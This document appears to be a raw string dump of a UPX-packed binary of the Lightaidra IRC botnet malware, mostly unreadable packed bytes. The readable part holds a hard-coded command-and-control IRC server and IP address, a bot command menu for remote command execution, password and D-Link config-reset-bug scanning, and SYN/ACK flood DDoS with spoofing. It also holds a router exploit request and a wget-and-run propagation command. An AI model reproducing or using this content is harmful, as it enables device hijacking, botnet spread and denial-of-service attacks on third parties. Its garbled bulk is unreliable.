UPX!L
7$':/
CS;Xc
>/\+
Ck:[
lc#H
0[G;
;o&g
<">.
/z".
[{?#
3(2g
<  2
%wN,20
hk?x
 c.a
scir
qeip
ogin
miil
kmij
ioih
gqif
esid
cuib
azi`
_wi^
]xi\
[!iZ
Y,iX
Ddo!k
p;4O<
6t?@
\#2T
$RwW
XHSC
C+wC 
{ko;
8g4S w
@!r@W@'@!U
A [0
.P;X
 g7 
6c6@;}
rh6^`
Dm{	e
%s'c
5-\S
00q(`
hH%N
DMTd4t
4`_ 
 IWlW>,x
E]S 
;	x+
8g274oKC
8\AS
0g,_
HGKS
3gk[+
lC<`
.KOa
v-KW,`k
GXHc4T
+, 4$
hC`I
y8%"
x@4#
3!']
l+dl
/(!!U
o<GA
ICaO
%+6T
1eO{
G2\B
y01;,?
yX0;T?
CL545
6IS^
+h}'
Q]#R
01\.
0u3@
R3h$
*fKc
 	7*
;</3
z;V7
Sat1k
{ABg
`G*~
47 +
WwoW
7w!KF
x0W\
@3m'I
2.Ka
)S5RK
p:&G
V#7"
A3^O
W6vG
;XC!
KdHS
Uu3(
kAt+P
ASWmp
  !6 K
7n$?
P a(w
{,#7/
!W6l
f@8G*
{g]\
Svf'
	3`BHk
Ptot	
`q@W
Pg6O
;(<'x
\HW}]
7PZ/
X[#+
s@+^o
#Qn-0
onC'
'CmW
dL(v;(
9+#GB
$g8>
Q#>'Q
t`# p
6o`R
Upsx
+E'v05
Vh#p7
/;[3
As.k
W?':
Gr+t
	Cbt
l=2]
Dypm
3+;0
7A|W@*[=S
+Ph#
#O 	k
16{0
#3{C
Y{18
[`Gl+
Xg2"B
}CTX
1C?R{
C	w4Ts7
@wm0#
 v+0
pSPO&
mGW_
S?gk
R{<*
GC4;-
@3A@`S7
$Gb$
=7O#
pc\c6(	
p`O^
!O*9$(B
lC<X1$
Z.o}7
1d/W
9s(`
g$ A
GgI&
\"Kg
\:S5
P_`p
\1'X
o{/'
c1Ys"
Wlp#6e
#?@P
#@04
!O0"g"
+O( 
;7C3
%088
< W^
H0?0
[(d@
 g0G
C1F+
`3nSl
(EF_.+
_8M,
@!Kb
$2D@
r@TD
w4+x
z\%K+
;#r7
f0a7
k/7`
Oup_o
_5F{
cWx_
:T+o6;
3T.5
i/	S4
]70LW
5X`w
!X[L
 o~w.1
C+Aq
7+6#
kpwH
Wxcp$SAv
u'/`
1K`sF!
 T=WX
TsD`
F3e/
Y;)C
0k8,
lt7,6
zE;j3
DFC6
L`1G
5sb7 
@}'P
/,3q4
s_# p_
A";0
*Z#d`{|
pQf'
/0K@VG
"0#|
q<7!
{[SP
?P0o3
SpcZ
Rm#d
d;Fc>
{WC:
JWU#
qCEI
/`32
->O1
ts .
P0{A+
G{ZP
tg1Q\
LsE5C
X';0
,*k+p7
+G;Z
.'E$
'Tu[m
lW}NS 
#SmtOC
7#L 
ZS	N
O;{7R{
(DoNc
7I3,
8G{#Ce
39%,/
SM3Pp/
0PI7
)7,T`
wD f3
+p@@
'?0D 
[PXsj
_=#n3
PIwt
R?8YL)c%E
AO30
@SA	;(+
4W+[3t
4V7n
4C,w
#spm
^{S_
?EIw
}?%_
`'` 
_jhC|,
/x	T
Cw]P
D$CP
s/^B
9CKk
"<u/
*F/k
TJC#?
Gs?T#c&
?`x 
{g3[
g"pg@
3U*[
!{;$3
wUbG
CA=O
w3QF
Lp#_PE8
]lkd`
Ppk 
Scw\
b %WC{*
#'pN
D[Ug'
 "Is@:
[vwd 
S3uPD
'H`S0@
7`0{
?Gc8
{hp#
$o> 0
rC[3`\
ecx#C
'PG#
#K'8c
W~$U
"x/\$
wH[<3=_
otcC
PpC7?b
o	K"
LgPc
:}#r@^;
'Cz;
EX/(
g4:K	
	uc\
7D=@
K@K?
*:?%
26Az(
uUCC
@hc"
_uKE@
W}o 
wKE*
K4PkKk
TFg\
QwRs5
D434=
6cH&{P
K\/=[
C;@EC
=g-G
-so?$
[<3EV
+CU[W
Ck*P
/m;\
[3$g
kpI_sV
$s$1
;p8@.
;cu'
m0Q'
[k$r
S2CK 
:'PS
FStu
S<Ro
1SK7
uc(D(
<34@3
6Rw+c
w0`3
$~wE0
dW;O'
7OwO
X0?6G
["<gx_6
Vo(+w
GP	3
W	Ap
g?l]
,W14[
6#1#{A(
dkr8
HMHX4X
<34MLD4\
K#50
c&@K
XMXH4H
M\T4L
K[&S
0\6[L
Q({(\
0pbO 
@[Ca
YsbES
\`TAs
H`(q
Ut[X
Or?(a
G', 
W?`m
Wo!_t
GAU`
,+1x
 j[,
Kkt`
b+CQN
!KA.
P]oRgoW
nxwV
]_8Z
78c*
Hs^#
P#3T
:K2W
/0Ko8
P!7vD 
*aGm;
vc<#
c<3o
c#1;
"o($+
Q`op
G gl
GC'k!;
Wh&`
vgyW
jS0)C
G0|70EX
v[ @
"x+j
u&TP
TLW:W
;HK4
O0DT
(#<m
TQ:C
"MwY
vKct
$g"hO
<gzK
WV$K?#e
v'3 "
D;g;
Fg#S
>{;(
swD/
$3,[&0$
N'6ca
!#D`
H3zL'
{D7DY_n
s03o
sQm+
O},e
Kp04
,D o6
!?jP
FQ{o
Pcmc(:
[Q r
!s1Q
pkl7=;
":{,
(1g	c
DCDpo[
,\dDX#Mt
GlGkT
2Rk[
3g:z
V3k+
DC@H
EHs`
C,Vo
4[X4W
 e2C
":c 
,l7@
@Vg;
_`4VD^g
_Oc&
3.&	
;sWASK
8WQr
Q$3q
G7D<
AGOz
Ol+@h
w"DS
:C, 
{46O4
;@`O
{DFO 
+SG'
C}Pe
A0E 
BotWF
,cpX
g04WUo?
UgG0
GX#;
' BtW
C?CO
8?"8
1?AF
_8(`[
Pe?}
b)G$D
SDL+
7PLW
>?Qg"G
<}/p
VW-'
Px?foc
8OPz7ZG5
ckS+^
*/W@
/qJ47
`ETI
3MN'/
zGNsP 
[R[H
pMk}
ks-k
SaK2
3okr c
S3 9{
JtFkm
1,n{"8
+$`"[
p;{[E
  @#E
',U"
LXi$
Hd`0
+sU*
DM'.
AD"_
*}{ 4
[VV]A
b1cd2ef3
gh4il5mn
6op7qr8s
t9uvz_	
jkx'
irc.poll
o.org
IVMSG
 Q :
n] you a
ged 
0snOry
$wron
g9ut
icati
 passwn d!
.255.3
GET /pl
aF H
TTP/1
:v}pech
netT\
y38.6
run/.lih
tpiz
23453
ABCDEFGH
OPQRS
TUVZYWKX
|:.*<8
;:,.-+*^
?=)(|-
&%$D"!o8yxz
nmxg
cba~qOFUC
 phS`
lhfn	
%vc7zv31
3;`k00
advsc
tg7e
_pdV6
ofg-
nfSo
>* *
 Acc
m(vs:
d3a4; 
- f(
ot';~
s3aw"FS
X9c[_
m6xage
>0Jvd>so%
7LA.
ug[R
C>`[`D 
"n C.D
s:dv*
DDoa1,#
g,OXfh
vp,D
*=4r,Hx
=x86
>p;<
Em, 
n06c)
k+`M,
&\,!
7Ql>
l(^S
W)G<
p70	
`74[^
ULL%
hhMa
x/16Q
0l]1
=^%s
 ZOMBIE
IasY
?![Ij
Kwnps2
:8)~
nge(p
a+R7
/5Bp
b-Ag
t/xml4;l
lV[l
dqpgz,	,R
-8859-1,
F7,go7n/Ke
j300
]@=-
41184
676[
4U.L
--a@GD
me="
j+-q
-R$l$ts
Hm`h
wg`3v 
:-cf
& sh
*bt]
#vpa
N-r_
LjztqZ
FeEgGaAC
x0-#'
NDms"K_fh
vY: 
2D+)gT0
aB;B1Y
ptfV
tl'm
lru:b
B.uh
lXlG
t on5
I-Ge+
lyfG
pGfK
o]$ed
n"s 2
evty
qvudCY
v3 ;
c)vchW,
vod1Wc`
omTC
(,;Dagfk
Lbjs
sg)s
-nd%
hopq
{Nam
^-}Nb
Ra=pa
7aL4
5a$w.
{jal!
l	Yl
by	:
($(Tl<dy>
Ilch
ffer
ed'B
: cB
Vrp'
%/oENFS
qre 
~&}K
u[Rp
/OFl
	%xp
xX7(
lowQ
w'whys
s)/ls1N=s2
AjHH
6C]F
->[F
TCGc
+0{E{E
Pa(*L
m=chd
] `lpe
L9<vwd/
|.[#
cKa`S
CAk[S
:	@@
PROT_EXEC|PROT_WRITE failed.
[MS]
0ab1cd2ef3gh4il5mn6op7qr8st9uvz_wyjkx
irc.pollo.org
192.79.153.207:6667
/var/run/.lightpid
#aidra
NICK %s
USER pwn localhost localhost :Lightaidra ;)
TOPIC %s
NICK %s
PRIVMSG %s :* .exec                 <commands>        - execute a system command
PRIVMSG %s :* .version                                - show the current version of bot
PRIVMSG %s :* .status                                 - show the status of bot
PRIVMSG %s :* .help                                   - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof
PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder
PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder
PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan        <channel>               - set new master channel
PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room
PRIVMSG %s :* .part           <channel>               - part bot from selected room
PRIVMSG %s :* .quit                                   - kill the current process
PRIVMSG %s :* *** EOF
Aidra?!
QUIT :pwn!
synflood packeting %s:%u (secs: %u)
PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
ngsynflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
ackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
ngackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
/var/run/.lightscan
PRIVMSG %s :[error] unable to open: %s
QUOTE ZOMBIE
%s.%s.%d.%d
%16s
POST /cgi-bin/firmwarecfg HTTP/1.1
Host: $IP
password>
password
root
rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
PRIVMSG %s :[nsynflood] packeting completed!
QUOTE ZOMBIE
PRIVMSG %s :[ngsynflood] packeting completed!
PRIVMSG %s :[ackflood] packeting completed!
PRIVMSG %s :[ngackflood] packeting completed!
0.9.30
/bin/sh
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
 !''-N.Y]Z
#$%&'()*+,234567
;<=>?@ABCDEFGJIMOPQRSTUVWX[abcxyz{|}~
Unknown error
Success
Cannot register service
xdr_array: out of memory
0123456789abcdef
/etc/hosts
/etc/config/hosts
%s%s%m
RPC: (unknown error code)
3.09
K-;}G
gs0n5[
{G&{^
/nES
C.#}
G'|P
k{cc{
@bQs>
k\	3=+
GCC: (G
NU) 3.
2 200
ian pre
leas
/hom
e/firmwao
ild/temp
5l/gcc-c
ib1funcs
WP#8
'&($
.symta
tr'ha	
init
}roda
eh_fra+m	pct
.g"b
$n>ade
nRfo
O6?'
w;R'
  l4H
eO2]
fd'9
ud'8@2
L5.d
M	dO;
'v0QOV
xu*@?_A-d/68
4F ?3
4x o3
!r`C
!%#?
aO{0
tOtH
	o{*
o@I_c?
7 /l
:	MO
C,$;x
$ aOv<
rl!C!!r
w/H)
h-$?,
4HOa6
~_D7
:/ :!rLC\$9
`o;@>O
lArJ
<@d|
H/]{
T@Pd
"FOA
1m_N
f$/6g
/80g,
/phE
uu/$5
eOx4u
75/o MIe
wS/p$M
/]l?
/X0O
D+?_
7Q/p
!O{X
hR]p
xhRK
?2HC
DHl|
,`/2
(?#?
+/\O
sA`lA
?}?N
gO.w
C?.Q
O;(/
l/qP
`/+e
;fO>_
5?,E
X@/7__
PI?]
oXow
?J|/1
]?Lv
s"]s
X?u!
8j!K/|
|OEe/
e6(E2
s{lTjO
&*2oA
|@_n-
(o,>
_=/j
|o{B
,@O]/
Y_wB
.KOuO
|O/4
"/*I/
r0eo
rIOz
Y?z33
 3<X
/h4RO
5O4 
P6VOX='
/d6H
I_x'7
7KOv
8 /.
/jW8
Fo]3
9TdS
G_A 
;B_no
Y?8};#?-
?$b?
O,;/
?u<E
<B_n
<+/$
sO^G>
?(K?
``_:
?B/^	B
`LK2
/jB@
j$UK_
z	Cd? 
	_7!
`EIOb
/K%O
xNF2
dx`/
HBoX
h`?7
I@e_
QJe_
?>?1
sWVD
4KFO[_
K2oA
$`O7+
L	?n
LI/`lO
LVoX
L o 
/CM@%
NK?A4
OB?X
OF/Z#
,On 
?=8P	
t?pT
c/sysde
ps/l
	stuffw+for
ce_to_
_CTOR_LI
EH_F
RAME_BEG
onple
ted.25
3u"d
^globa
ect<
4du.xls
~4471
5	2t
requeW
>11H
	30l93
?errnovuth
)ad_s
own_@n
spendn
' 7Echs
Oan-
.c -
9sJX
G2_u
newh
keys
	cur
Xll%
iouize`O
hHk lDxple
zm0rz
v1)o
lx#Dw!nmgncry
JshX
)XrL
g4iz
{im^
open`
io'0
,8'r"p
in k
yiuXz
<u3X
wait
vdio
29?i
[Oav
41-O
4LlY_"
9pu!
|len
4hE=
	rpy
}xpg
:1088
~tcdrR%m	
i7Z6
mRbm
8nf8
abor
!pll
hAyQ
2789
pc_dX
C_VARS
BV0.K
p2A 
fa$(
{fmt
pSZR4
wedM
l0cdI
:resd
 ffY
ope%
P=fl~K48#
0muxm
on:`
{tes/
@jprea
mbcw
READ
jQ@.
rfil
p~kffs
n.hl
>3839
On4r
C71304
C_d$
HA6<
0_"k
,76&
"GIF
3{PmQ-+h
d!jI
ahB]+ze
__	Y
B6j#2
_rT,&
3IfS
nIa !>
&7"/jd7
cksi
se27
<vc`
-H5!q
06&k
np$E
wa0J
v_o,
y$x,0Y
>|bos
>xipe
D0Yh
!H3*
Z>xid
tT)	
pct UZ
5XH(
b8__
p1/aV
XCjH F
Uf!/@
s`J9
l`_B
thALD
_!I4!u
sdbA
HOothFzK
tnpH) 
n% F
X=g'
BDzed
%l,H0(
tuain
.fip
f>Vqu
d@.Y
@S@X
H( B
U1Xk
ooI|JC
96i"
%F"k
vZMi
K:[sv
 Kat$	
m?Sg
T}-g
r'9ck
~$G%
cast
ar_Uf
h,@$0
edE6CXB
2i@ 
0uQn
noeJ
emA?
XU4i
qpyB
ll6s
&t64
5!j]t
1R<\
A`oH
l50R
5Itb
G+tex
lnd+
g~.__
q5gso
p/)?
@aB	
1R@R2?F
6F}b
uFH0f(
H{h2
@HMH)c	
D.[et
)4	ea
HerA
VTKP
s7-"
SOto
"B ^
fbi2
1!^;ng5
JIMTd: I
TksumX5
KalQ m!
 CzA
 qE^7
lg#la
icat
"@dL"
>reat
to@a`rw
Jv_R_
ses 
2X I
5R/G@
<jA`
#>bb
UPX!
UPX!
